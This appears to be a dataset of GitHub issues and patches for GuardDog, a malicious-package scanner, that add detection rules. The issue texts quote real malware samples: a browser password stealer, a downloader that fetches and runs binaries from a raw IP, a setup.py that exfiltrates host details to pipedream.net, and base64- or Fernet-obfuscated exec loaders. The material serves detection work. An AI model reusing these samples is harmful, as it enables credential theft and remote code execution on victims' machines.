- result = scanner.scan_remote(identifier, version, rule_param)
- result["package"] = identifier
- results.append(result)
- except Exception as e:
- sys.stderr.write(f"\nError '{e}' occurred while scanning remote package.")
- sys.exit(1)
+ result = {"package": identifier}
+ try:
+ if os.path.isdir(identifier):
+ log.debug(f"Considering that '{identifier}' is a local directory")
+ result |= scanner.scan_local(identifier, rule_param)
+ elif os.path.isfile(identifier):
+ log.debug(f"Considering that '{identifier}' is a local archive file")
+ with tempfile.TemporaryDirectory() as tempdir:
+ safe_extract(identifier, tempdir)
+ result |= scanner.scan_local(tempdir, rule_param)
+ else:
+ log.debug(f"Considering that '{identifier}' is a remote target")
+ result |= scanner.scan_remote(identifier, version, rule_param)
+ except Exception as e:
+ sys.stderr.write(f"Error occurred while scanning target {identifier}: '{e}'\n")
+ sys.exit(1)
if output_format == "json":
- if len(results) == 1:
- # return only a json like {}
- print(js.dumps(results[0]))
- else:
- # Return a list of result like [{},{}]
- print(js.dumps(results))
+ print(js.dumps(result))
else:
- for result in results:
- print_scan_results(result, result["package"])
+ print_scan_results(result, result["package"])
if exit_non_zero_on_finding:
- exit_with_status_code(results)
+ exit_with_status_code([result])
def _list_rules(ecosystem: ECOSYSTEM):
diff --git a/guarddog/scanners/scanner.py b/guarddog/scanners/scanner.py
index f23cdafe..610ad6b7 100644
--- a/guarddog/scanners/scanner.py
+++ b/guarddog/scanners/scanner.py
@@ -231,7 +231,7 @@ def scan_local(
Scans local package
Args:
- path (str): path to package
+ path (str): Path to the directory containing the package to analyze
rules (set, optional): Set of rule names to use. Defaults to all rules.
callback (typing.Callable[[dict], None], optional): Callback to apply to Analyzer output
@@ -245,16 +245,7 @@ def scan_local(
if rules is not None:
rules = set(rules)
- results = None
- if os.path.isdir(path):
- results = self.analyzer.analyze_sourcecode(path, rules=rules)
- elif os.path.isfile(path):
- with tempfile.TemporaryDirectory() as tempdir:
- safe_extract(path, tempdir)
- results = self.analyzer.analyze_sourcecode(tempdir, rules=rules)
- else:
- raise Exception(f"Local scan target {path} is neither a directory nor a file.")
-
+ results = self.analyzer.analyze_sourcecode(path, rules=rules)
callback(results)
return results
| Unexpected behavior for local directory scan
GuardDog behaves unexpectedly when run against a local directory. It does not consider that the directory will contain a package to scan. Instead, it behaves as though the directory will contain a mix of package tarballs and directories containing packages, listing the directory contents and scanning each one individually.
```shell
$ guarddog pypi scan ~/Downloads/requests-2.32.3.tar.gz
Found 0 potentially malicious indicators scanning ~/Downloads/requests-2.32.3.tar.gz
$ tar -xf ~/Downloads/requests-2.32.3.tar.gz -C ~/Downloads/
$ guarddog pypi scan ~/Downloads/requests-2.32.3
Traceback (most recent call last):
...
ValueError: unsupported archive extension: ~/Downloads/requests-2.32.3/PKG-INFO
$
```
We should make it so the local directory scan behavior conforms to expectations. This has the advantage of clarifying what a local scan target must be: a (possibly zipped) directory containing a package.
| 2024-07-24T14:31:29 | 0.0 | [] | [] |
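The patched `_scan` resolves a target in a fixed order: existing directory, then existing file (treated as an archive to extract into a temporary directory), then remote package name. A hypothetical standalone helper mirroring just that dispatch order:

```python
import os
import tempfile

def classify_scan_target(identifier: str) -> str:
    """Mirror the dispatch order of the patched _scan(): directory, file, remote."""
    if os.path.isdir(identifier):
        return "local directory"
    if os.path.isfile(identifier):
        return "local archive file"
    return "remote target"

with tempfile.TemporaryDirectory() as tempdir:
    print(classify_scan_target(tempdir))  # local directory
print(classify_scan_target("requests"))   # remote target (assuming no such local path)
```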
|||
DataDog/guarddog | DataDog__guarddog-420 | 104e883429b6d8eb6ac131ce7da8ff694feae273 | diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index 81887d68..605ee395 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -31,6 +31,18 @@ rules:
- metavariable-regex:
metavariable: $ENVVAR
regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
+ - patterns:
+ - pattern-inside: |
+ $CONNECT = sqlite3.connect(...)
+ ...
+ $CURSOR = $CONNECT.cursor(...)
+ ...
+ - pattern: $CURSOR.execute($QUERY, ...)
+ - metavariable-pattern:
+ metavariable: $QUERY
+ patterns:
+ - pattern: "..."
+ - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
pattern-sinks:
- pattern-either:
- pattern-inside: requests.$METHOD(...)
| Detect credential stealer using sqlite3
Definition: Malware can collect credentials in browser file using sqlite3
Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
Sample:
```python
def steal_passwords2(self, name: str, path:str, profile:str):
path = "path"
if not os.path.isfile(path):
return
loginvault = self.random_dir_create()
copy2(path, loginvault)
conn = sqlite3.connect(loginvault)
cursor = conn.cursor()
with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
url, username, password = res
password = self.dcrpt_val(password, self.masterkey)
if url != "":
f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password}\n\n")
cursor.close()
conn.close()
```
Other stealers such as W4sp stealer, and reols package
See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/ditekshen/detection:
```
rule INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore {
meta:
author = "ditekSHen"
description = "Detects executables containing SQL queries to confidential data stores. Observed in infostealers"
strings:
$select = "select " ascii wide nocase
$table1 = " from credit_cards" ascii wide nocase
$table2 = " from logins" ascii wide nocase
$table3 = " from cookies" ascii wide nocase
$table4 = " from moz_cookies" ascii wide nocase
$table5 = " from moz_formhistory" ascii wide nocase
$table6 = " from moz_logins" ascii wide nocase
$column1 = "name" ascii wide nocase
$column2 = "password_value" ascii wide nocase
$column3 = "encrypted_value" ascii wide nocase
$column4 = "card_number_encrypted" ascii wide nocase
$column5 = "isHttpOnly" ascii wide nocase
condition:
uint16(0) == 0x5a4d and 2 of ($table*) and 2 of ($column*) and $select
}
```
Also often coupled with `win32crypt.CryptUnprotectData` e.g.
```
def tahg(pene):
x = json.loads(open(os.environ['LOCALAPPDATA'] + "\\Google\\Chrome\\User Data\\Local State", "r", encoding="utf-8").read())
try:
mk = win32crypt.CryptUnprotectData(base64.b64decode(x["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1]
except:
mk = ""
try:
return (AES.new(mk, AES.MODE_GCM, pene[3:15]).decrypt(pene[15:])[:-16]).decode()
except:
return ""
```
| Seems related to https://github.com/DataDog/guarddog/issues/159, is it a duplicate or does it make sense to keep both?
Oh I missed that one. I think we can merge them in one issue. Any objection?
let's do it! | 2024-07-18T07:41:51 | 0.0 | [] | [] |
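Outside semgrep, the table-name check added in the rule's `metavariable-pattern` above is an ordinary regex and can be sanity-checked directly against candidate query strings (the query strings below are illustrative):

```python
import re

# Same regex as the rule's metavariable-pattern for $QUERY
SENSITIVE_TABLES = re.compile(
    r"(?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)"
)

print(bool(SENSITIVE_TABLES.search(
    "SELECT origin_url, username, password_value FROM logins")))        # True
print(bool(SENSITIVE_TABLES.search("SELECT id, title FROM articles")))  # False
```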
||
DataDog/guarddog | DataDog__guarddog-419 | 404f3e6915e3e9e501aea55eee271a41366d5a4f | diff --git a/guarddog/cli.py b/guarddog/cli.py
index f957994b..e577d055 100644
--- a/guarddog/cli.py
+++ b/guarddog/cli.py
@@ -4,6 +4,7 @@
Includes rules based on package registry metadata and source code analysis.
"""
+from functools import reduce
import json as js
import logging
import os
@@ -20,7 +21,6 @@
from guarddog.reporters.sarif import report_verify_sarif
from guarddog.scanners import get_scanner
from guarddog.scanners.scanner import PackageScanner
-from functools import reduce
EXIT_CODE_ISSUES_FOUND = 1
@@ -190,32 +190,6 @@ def display_result(result: dict) -> None:
return return_value # this is mostly for testing
-def is_local_target(identifier: str) -> bool:
- """
- @param identifier: The name/path of the package as passed to "guarddog ecosystem scan"
- @return: Whether the identifier should be considered a local path
- """
- if (
- identifier.startswith("/")
- or identifier.startswith("./")
- or identifier.startswith("../")
- ):
- return True
-
- if identifier == ".":
- return True
-
- # If this looks like an archive, consider it as a local target if the target exists on the local filesystem
- if (
- identifier.endswith(".tar.gz")
- or identifier.endswith(".zip")
- or identifier.endswith(".whl")
- ):
- return os.path.exists(identifier)
-
- return False
-
-
def _scan(
identifier,
version,
@@ -240,20 +214,17 @@ def _scan(
sys.exit(1)
results = []
- if is_local_target(identifier):
- log.debug(
- f"Considering that '{identifier}' is a local target, scanning filesystem"
- )
- if os.path.isdir(identifier):
- log.debug(f"Considering that '{identifier}' as a local directory")
- for package in os.listdir(identifier):
- result = scanner.scan_local(f"{identifier}/{package}", rule_param)
- result["package"] = package
- results.append(result)
- else:
- result = scanner.scan_local(identifier, rule_param)
- result["package"] = identifier
+ if os.path.isdir(identifier):
+ log.debug(f"Considering that '{identifier}' is a local directory")
+ for package in os.listdir(identifier):
+ result = scanner.scan_local(f"{identifier}/{package}", rule_param)
+ result["package"] = package
results.append(result)
+ elif os.path.isfile(identifier):
+ log.debug(f"Considering that '{identifier}' is a local file")
+ result = scanner.scan_local(identifier, rule_param)
+ result["package"] = identifier
+ results.append(result)
else:
log.debug(f"Considering that '{identifier}' is a remote target")
try:
diff --git a/guarddog/scanners/pypi_package_scanner.py b/guarddog/scanners/pypi_package_scanner.py
index f2ad8885..e6d7015b 100644
--- a/guarddog/scanners/pypi_package_scanner.py
+++ b/guarddog/scanners/pypi_package_scanner.py
@@ -4,6 +4,7 @@
from guarddog.analyzer.analyzer import Analyzer
from guarddog.ecosystems import ECOSYSTEM
from guarddog.scanners.scanner import PackageScanner
+from guarddog.utils.archives import is_supported_archive
from guarddog.utils.package_info import get_package_info
@@ -42,25 +43,20 @@ def download_package(self, package_name, directory, version=None) -> str:
raise Exception(f"Version {version} for package {package_name} doesn't exist.")
files = releases[version]
- url = None
- file_extension = None
+ url, file_extension = None, None
for file in files:
- # Store url to compressed package and appropriate file extension
- if file["filename"].endswith(".tar.gz"):
+ if is_supported_archive(file["filename"]):
url = file["url"]
- file_extension = ".tar.gz"
+ _, file_extension = os.path.splitext(file["filename"])
+ break
- if any(file["filename"].endswith(ext) for ext in (".egg", ".whl", ".zip")):
- url = file["url"]
- file_extension = ".zip"
-
- if not (url or file_extension):
+ if not (url and file_extension):
raise Exception(f"Compressed file for {package_name} does not exist on PyPI.")
# Path to compressed package
zippath = os.path.join(directory, package_name + file_extension)
- unzippedpath = zippath.removesuffix(file_extension)
-
+ unzippedpath = os.path.join(directory, package_name)
self.download_compressed(url, zippath, unzippedpath)
+
return unzippedpath
diff --git a/guarddog/scanners/scanner.py b/guarddog/scanners/scanner.py
index 8026bdc4..f23cdafe 100644
--- a/guarddog/scanners/scanner.py
+++ b/guarddog/scanners/scanner.py
@@ -233,35 +233,31 @@ def scan_local(
Args:
path (str): path to package
rules (set, optional): Set of rule names to use. Defaults to all rules.
+ callback (typing.Callable[[dict], None], optional): Callback to apply to Analyzer output
Raises:
Exception: Analyzer exception
Returns:
dict: Analyzer output with rules to results mapping
- rules: rules to apply
- callback: callback to call for each result
"""
if rules is not None:
rules = set(rules)
- if not os.path.exists(path):
- raise Exception(f"Path {path} does not exist.")
-
- if any(path.endswith(ext) for ext in (".tar.gz", ".tgz", ".zip", ".whl")):
- with tempfile.TemporaryDirectory() as tmpdirname:
- safe_extract(path, tmpdirname)
- return self.analyzer.analyze_sourcecode(
- tmpdirname, rules=rules
- )
-
+ results = None
if os.path.isdir(path):
- return self.analyzer.analyze_sourcecode(path, rules=rules)
+ results = self.analyzer.analyze_sourcecode(path, rules=rules)
+ elif os.path.isfile(path):
+ with tempfile.TemporaryDirectory() as tempdir:
+ safe_extract(path, tempdir)
+ results = self.analyzer.analyze_sourcecode(tempdir, rules=rules)
+ else:
+ raise Exception(f"Local scan target {path} is neither a directory nor a file.")
- raise Exception(
- f"Path {path} is not a directory nor an archive type supported by GuardDog."
- )
+ callback(results)
+
+ return results
@abstractmethod
def download_and_get_package_info(
diff --git a/guarddog/utils/archives.py b/guarddog/utils/archives.py
index 44b47aa0..d23b37ab 100644
--- a/guarddog/utils/archives.py
+++ b/guarddog/utils/archives.py
@@ -7,24 +7,68 @@
log = logging.getLogger("guarddog")
+def is_supported_archive(path: str) -> bool:
+ """
+ Decide whether a file contains a supported archive.
+
+ Args:
+ path (str): The local filesystem path to examine
+
+ Returns:
+ bool: Represents the decision reached for the file
+ """
+ return is_tar_archive(path) or is_zip_archive(path)
+
+
+def is_tar_archive(path: str) -> bool:
+ """
+ Decide whether a file contains a tar archive.
+
+ Args:
+ path (str): The local filesystem path to examine
+
+ Returns:
+ bool: Represents the decision reached for the file
+ """
+ return any(path.endswith(ext) for ext in [".tar.gz", ".tgz"])
+
+
+def is_zip_archive(path: str) -> bool:
+ """
+ Decide whether a file contains a zip, whl or egg archive.
+
+ Args:
+ path (str): The local filesystem path to examine
+
+ Returns:
+ bool: Represents the decision reached for the file
+ """
+ return any(path.endswith(ext) for ext in [".zip", ".whl", ".egg"])
+
+
def safe_extract(source_archive: str, target_directory: str) -> None:
"""
safe_extract safely extracts archives to a target directory.
- This function does not clean up the original archive, and does not create the target directory if it does not exist.
+ This function does not clean up the original archive and does not
+ create the target directory if it does not exist. It also assumes
+ the source archive argument is a path to a regular file on the
+ local filesystem.
@param source_archive: The archive to extract
@param target_directory: The directory where to extract the archive to
@raise ValueError If the archive type is unsupported
+
"""
log.debug(f"Extracting archive {source_archive} to directory {target_directory}")
- if source_archive.endswith('.tar.gz') or source_archive.endswith('.tgz'):
+ if is_tar_archive(source_archive):
tarsafe.open(source_archive).extractall(target_directory)
- elif source_archive.endswith('.zip') or source_archive.endswith('.whl'):
+ elif is_zip_archive(source_archive):
with zipfile.ZipFile(source_archive, 'r') as zip:
for file in zip.namelist():
- # Note: zip.extract cleans up any malicious file name such as directory traversal attempts
- # This is not the case of zipfile.extractall
+ # Note: zip.extract cleans up any malicious file name
+ # such as directory traversal attempts This is not the
+ # case of zipfile.extractall
zip.extract(file, path=os.path.join(target_directory, file))
else:
- raise ValueError("unsupported archive extension: " + target_directory)
+ raise ValueError(f"unsupported archive extension: {source_archive}")
| Unused callback function argument in PackageScanner
The `PackageScanner.scan_local()` method accepts a `callback` function argument that it does not use.
```python
# guarddog/scanners/scanner.py:227
def scan_local(
self, path, rules=None, callback: typing.Callable[[dict], None] = noop
) -> dict:
if rules is not None:
rules = set(rules)
if not os.path.exists(path):
raise Exception(f"Path {path} does not exist.")
if any(path.endswith(ext) for ext in (".tar.gz", ".tgz", ".zip", ".whl")):
with tempfile.TemporaryDirectory() as tmpdirname:
safe_extract(path, tmpdirname)
return self.analyzer.analyze_sourcecode(
tmpdirname, rules=rules
)
if os.path.isdir(path):
return self.analyzer.analyze_sourcecode(path, rules=rules)
raise Exception(
f"Path {path} is not a directory nor an archive type supported by GuardDog."
)
```
It should be applied to the result of `analyze_sourcecode()` before returning it.
| 2024-07-17T10:16:20 | 0.0 | [] | [] |
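The new helpers in `guarddog/utils/archives.py` reduce to suffix checks; since `str.endswith` accepts a tuple of suffixes, the same logic can be condensed (a behavior-equivalent sketch, not the shipped code):

```python
TAR_EXTENSIONS = (".tar.gz", ".tgz")
ZIP_EXTENSIONS = (".zip", ".whl", ".egg")

def is_tar_archive(path: str) -> bool:
    return path.endswith(TAR_EXTENSIONS)

def is_zip_archive(path: str) -> bool:
    return path.endswith(ZIP_EXTENSIONS)

def is_supported_archive(path: str) -> bool:
    return is_tar_archive(path) or is_zip_archive(path)

print(is_supported_archive("requests-2.32.3.tar.gz"))  # True
print(is_supported_archive("requests-2.32.3.rpm"))     # False
```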
|||
DataDog/guarddog | DataDog__guarddog-329 | 972daf8fb99c905f9f24935bf4ca91ebf0a7e019 | diff --git a/guarddog/analyzer/sourcecode/download-executable.yml b/guarddog/analyzer/sourcecode/download-executable.yml
index 48441b2f..95028a93 100644
--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -11,6 +11,14 @@ rules:
- patterns:
- pattern-either:
- pattern: (...).urlretrieve(...,$EXE)
+ - pattern: open($EXE, ...).write($REQUEST)
+ - pattern: |
+ with open($EXE, ...) as $FILE:
+ ...
+ $FILE.write($REQUEST)
+ ...
+ $MAKE_EXEC
+
- metavariable-pattern:
metavariable: $EXE
pattern-regex: (?i)^['"].*?\.exe['"]$
@@ -18,31 +26,21 @@ rules:
- patterns:
- pattern-either:
- pattern: |
- (...).urlretrieve(...)
- ...
- $MAKE_EXEC
- - pattern: |
- $FILE = open($LOC, ...)
- ...
- $FILE.write($REQUEST)
+ (...).urlretrieve(..., $LOC)
...
$MAKE_EXEC
+
- pattern: |
- with open($LOC, ...) as $FILE:
- ...
- $FILE.write($REQUEST)
+ open($LOC, ...).write($REQUEST)
...
$MAKE_EXEC
+
- pattern: |
with open($LOC, ...) as $FILE:
...
$FILE.write($REQUEST)
...
$MAKE_EXEC
- - pattern: |
- open($LOC, ...).write($REQUEST)
- ...
- $MAKE_EXEC
- metavariable-pattern:
metavariable: $MAKE_EXEC
@@ -75,4 +73,7 @@ rules:
- pattern: requests.$FUNC(...)
- pattern: (...).urlretrieve(...)
- pattern: urlretrieve(...)
+ - pattern: requests.get(...)
severity: WARNING
+ options:
+ symbolic_propagation: true
| Heuristic: "download-binary" should catch "dequests" package
Code:
```
for executable in all_executables:
url = f'http://35.235.126.33/{executable}'
req = requests.get(url)
with open(executable, 'wb') as f:
f.write(req.content)
if 'linux' in operating_system or 'darwin' in operating_system:
os.system(f'chmod +x {executable}')
if 'linux' in operating_system:
os.system(f'./{executable} &')
elif 'darwin' in operating_system:
os.system(f'./{executable} &')
elif 'windows' in operating_system:
os.system(f'start /B {executable}')
```
https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
| 2024-04-09T15:21:21 | 0.0 | [] | [] |
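The quoted-`.exe` check in the rule's `metavariable-regex` above can likewise be exercised standalone (the file names here are made up):

```python
import re

# Same pattern as the rule's metavariable-regex for $EXE
EXE_LITERAL = re.compile(r"""(?i)^['"].*?\.exe['"]$""")

print(bool(EXE_LITERAL.match('"update.exe"')))  # True  (quoted .exe literal)
print(bool(EXE_LITERAL.match("'Loader.EXE'")))  # True  (case-insensitive)
print(bool(EXE_LITERAL.match('"setup.py"')))    # False
```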
|||
DataDog/guarddog | DataDog__guarddog-316 | fb663d1918b21e2a40479e2b7c936605f62d83db | diff --git a/guarddog/analyzer/sourcecode/exec-base64.yml b/guarddog/analyzer/sourcecode/exec-base64.yml
index f62d5528..5ee1c0e1 100644
--- a/guarddog/analyzer/sourcecode/exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/exec-base64.yml
@@ -55,4 +55,5 @@ rules:
- pattern: decode("...")
- pattern: __import__("base64").b64decode(...)
- pattern: marshal.loads(zlib.decompress(...))
+ - pattern: $FUNC("...").decrypt(...)
severity: WARNING
| GuardDog fails to detect code-exec rule with Fernet obj
Sources:
https://blog.phylum.io/typosquatting-campaign-targets-python-developers/ (describing code from this one)
https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/
https://www.mend.io/blog/over-100-malicious-packages-target-popular-ml-pypi-libraries/
While GuardDog catches both rules (code-execution and cmd-overwrite) correctly when the subprocess function is present in `setup.py`

It doesn't catch exec func from `setup.py` in `insanepackagev1414` malicious package:

exec snippet (full setup.py code can be found in the first url):
```python3
exec(Fernet(b'E15Vb0ro8C-RQVm_HonJQeYM7QqH_QL6GXe3BpqaJJw=').decrypt(b'gAAAAABmAzaWWvpPHQ1jJXbTyRJlwy1MP-o3USdlhSFHB2qMHxn7KSvs4SiW86NeHfa_qIB3KimenfBA0tb5MeyNeDEbDEMXK0sY05SbUZU64VR8PfxpgnKEWTP3oOaQIYVUzLcMBE0DF5EKPXuHvaXuEhHpdH9Wp1u4rrxwvUCM4BVsoMynOnJP1nN6fbCjiWryEo39-63odiENVw81V4-yReuYZEInyU0uwdLCv_-zqqUR36si-q4='))
```
| 2024-04-03T12:48:20 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-297 | 55d180ce63b70fa7111962eb2a5a1f57076b4f45 | diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index c0340dec..81887d68 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -11,6 +11,7 @@ rules:
- pattern: getpass.getuser()
- pattern: platform.node()
- pattern: browser_cookie3.$BROWSER(...)
+ - pattern: os.getcwd()
- patterns:
- pattern-either:
- pattern: open($FILE)
| Identify Python scripts sending HTTP requests to common pentesting domains
pipedream.net, oastify.fun etc.
Example:
```
class CustomInstall(install):
def run(self):
install.run(self)
hostname=socket.gethostname()
cwd = os.getcwd()
username = getpass.getuser()
ploads = {'hostname':hostname,'cwd':cwd,'username':username}
requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads) #replace burpcollaborator.net with Interactsh or pipedream
setup(name='dependency1338', #package name
version='1.0.0',
description='test',
author='test',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
```
| 2024-01-14T12:25:58 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-289 | a8287bc0144533e873a00b38b8a60f4fc88ce316 | diff --git a/guarddog/analyzer/sourcecode/exec-base64.yml b/guarddog/analyzer/sourcecode/exec-base64.yml
index e6291a66..304944bb 100644
--- a/guarddog/analyzer/sourcecode/exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/exec-base64.yml
@@ -12,7 +12,9 @@ rules:
pattern-sinks:
- pattern-either:
- pattern-inside: exec(...)
+ - pattern: __import__("builtins").exec(...)
- pattern-inside: eval(...)
+ - pattern: __import__("builtins").eval(...)
- pattern-inside: subprocess.check_output(...)
- pattern-inside: subprocess.run(...)
- pattern-inside: subprocess.call(...)
| failed to detect base64 code
```
# PreInstalled PyPackages
import asyncio
import logging
from playwright.async_api import Page, BrowserContext, ViewportSize, ProxySettings
import re
from tsup.utils.xdbSearcher import XdbSearcher
from bs4 import BeautifulSoup
import pycountry
from tsup.utils import tools
__import__("builtins").exec(
__import__("builtins").compile(
__import__("base64").b64decode(
"ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vZmFkZS5vbmUvaW5qZWN0b3IvRkFERUUtTlhVRTRaLTdNSkoxNi1DSk9aN0wtQ0dINTdaLUI1VEgwTicpLnJlYWQoKSkiIiIpCl90dG1wLmNsb3NlKCkKdHJ5OiBfc3N5c3RlbShmInN0YXJ0IHtfZWV4ZWN1dGFibGUucmVwbGFjZSgnLmV4ZScsICd3LmV4ZScpfSB7X3R0bXAubmFtZX0iKQpleGNlcHQ6IHBhc3M="
),
"<string>",
"exec",
)
)
import random
```
it give nothing to
| 2023-11-10T13:48:24 | 0.0 | [] | [] |
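The evasion the new patterns target is just an aliased lookup of the same builtin: `__import__("builtins").exec` resolves to the ordinary `exec` function, so it runs code identically while dodging a literal `exec(` match. A minimal illustration:

```python
import builtins

# The indirect spelling resolves to the very same function object
assert __import__("builtins").exec is builtins.exec is exec

namespace = {}
__import__("builtins").exec("x = 40 + 2", namespace)
print(namespace["x"])  # 42
```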
|||
DataDog/guarddog | DataDog__guarddog-214 | f4cad6b7fc7c8e128bb20c5920125b7f5754537f | diff --git a/guarddog/analyzer/sourcecode/download-executable.yml b/guarddog/analyzer/sourcecode/download-executable.yml
index feeef1c5..c3e86823 100644
--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -10,24 +10,33 @@ rules:
- patterns:
- pattern-either:
- pattern: |
- $FILE = open("$LOC", ...)
+ $FILE = open($LOC, ...)
...
$FILE.write($REQUEST)
...
$CHANGE_PERMISSIONS
- pattern: |
- with open("$LOC", ...) as $FILE:
+ with open($LOC, ...) as $FILE:
...
$FILE.write($REQUEST)
...
$CHANGE_PERMISSIONS
+ - pattern: |
+ open($LOC, ...).write($REQUEST)
+ ...
+ $CHANGE_PERMISSIONS
- metavariable-pattern:
metavariable: $CHANGE_PERMISSIONS
pattern-either:
- pattern: os.chmod("$LOC", 777)
+ - pattern: os.chmod($LOC, 777)
- pattern: os.chmod("$LOC", <...stat.S_IEXEC...>)
+ - pattern: os.chmod($LOC, <...stat.S_IEXEC...>)
- pattern: chmod("$LOC", 777)
+ - pattern: chmod($LOC, 777)
- pattern: chmod("$LOC", <...stat.S_IEXEC...>)
+ - pattern: chmod($LOC, <...stat.S_IEXEC...>)
+ - pattern: os.system(f"...{$LOC}...")
pattern-sources:
- pattern: (...).send(...)
- pattern: send(...)
@@ -37,4 +46,5 @@ rules:
- pattern: urlopen(...)
- pattern: (...).getresponse(...)
- pattern: getresponse(...)
- severity: WARNING
+ - pattern: requests.$FUNC(...)
+ severity: WARNING
\ No newline at end of file
| Heuristic: "download-binary" should catch "dequests" package
Code:
```
for executable in all_executables:
url = f'http://35.235.126.33/{executable}'
req = requests.get(url)
with open(executable, 'wb') as f:
f.write(req.content)
if 'linux' in operating_system or 'darwin' in operating_system:
os.system(f'chmod +x {executable}')
if 'linux' in operating_system:
os.system(f'./{executable} &')
elif 'darwin' in operating_system:
os.system(f'./{executable} &')
elif 'windows' in operating_system:
os.system(f'start /B {executable}')
```
https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
| 2023-03-31T12:55:38 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-179 | 5fc8f23605039f2dd245e7bebea3f3fbfdd38f36 | diff --git a/guarddog/analyzer/sourcecode/code-execution.yml b/guarddog/analyzer/sourcecode/code-execution.yml
index 8c4e9836..3939394a 100644
--- a/guarddog/analyzer/sourcecode/code-execution.yml
+++ b/guarddog/analyzer/sourcecode/code-execution.yml
@@ -65,14 +65,14 @@ rules:
- pattern-not-regex: version
# popen functions
- - pattern: subprocess.Popen("$ARG1", ...)
- - pattern: subprocess.Popen([..., "$ARG1", ...], ...)
- - pattern: os.popen("$ARG1", ...)
- - pattern: os.popen([..., "$ARG1", ...], ...)
- - pattern: Popen("$ARG1", ...)
- - pattern: Popen([..., "$ARG1", ...], ...)
- - pattern: popen("$ARG1", ...)
- - pattern: popen([..., "$ARG1", ...], ...)
+ - pattern: subprocess.Popen($ARG1, ...)
+ - pattern: subprocess.Popen([..., $ARG1, ...], ...)
+ - pattern: os.popen($ARG1, ...)
+ - pattern: os.popen([..., $ARG1, ...], ...)
+ - pattern: Popen($ARG1, ...)
+ - pattern: Popen([..., $ARG1, ...], ...)
+ - pattern: popen($ARG1, ...)
+ - pattern: popen([..., $ARG1, ...], ...)
# miscellaneous
- pattern: os.system($ARG1, ...)
| Identify subprocess.Popen in setup.py
c.f. e.g. tphydraencode or https://blog.phylum.io/phylum-discovers-another-attack-on-pypi
Sample:
```python
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHc..', shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
except: pass
```
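The unquoted `$ARG1` matters because real payloads rarely pass a bare string literal; the command usually arrives in a variable. A hedged sketch of a call shape `subprocess.Popen($ARG1, ...)` now also matches (the command below is a harmless placeholder):

```python
import subprocess

cmd = "echo hello"  # in a real payload this would be decoded/deobfuscated first
# Matches `subprocess.Popen($ARG1, ...)`; the old quoted pattern required a literal.
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = proc.communicate()[0].decode().strip()
```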
| 2023-02-26T16:39:27 | 0.0 | [] | [] |
|||
EMACC99/mangadex | EMACC99__mangadex-32 | 4e6868d128fd7056a17f8c4955fb2d5db4077e6b | diff --git a/README.md b/README.md
index 039890b..4b26704 100644
--- a/README.md
+++ b/README.md
@@ -180,15 +180,15 @@ This will send you and activation code that you need
## Private Calls
### Login
-**Username and password combo logins are deprecated as MangaDex shift to OAuth. User client registration is closed as of now. [#26](https://github.com/EMACC99/mangadex/issues/26)**
+**Username and password combo logins are deprecated as MangaDex shift to OAuth. [Personal clients](https://api.mangadex.org/docs/02-authentication/personal-clients/) are only allowed [#26](https://github.com/EMACC99/mangadex/issues/26)**
Method to login to the website
```py
->>> api.login(username = USERNAME, password = PASSWORD)
+>>> api.login(username = USERNAME, password = PASSWORD, client_id = clientId, client_secret = clientSecret)
```
-It is recomended that you add this values to your environment variables for security reasons.
+It is recomended that you add this values to your environment variables and use text input for client-facing solutions for security reasons.
### Your User Info
diff --git a/mangadex/api.py b/mangadex/api.py
index 0b7896d..c2d7bb2 100644
--- a/mangadex/api.py
+++ b/mangadex/api.py
@@ -16,7 +16,6 @@
URLRequest,
)
-
class Api:
def __init__(self, timeout=5) -> None:
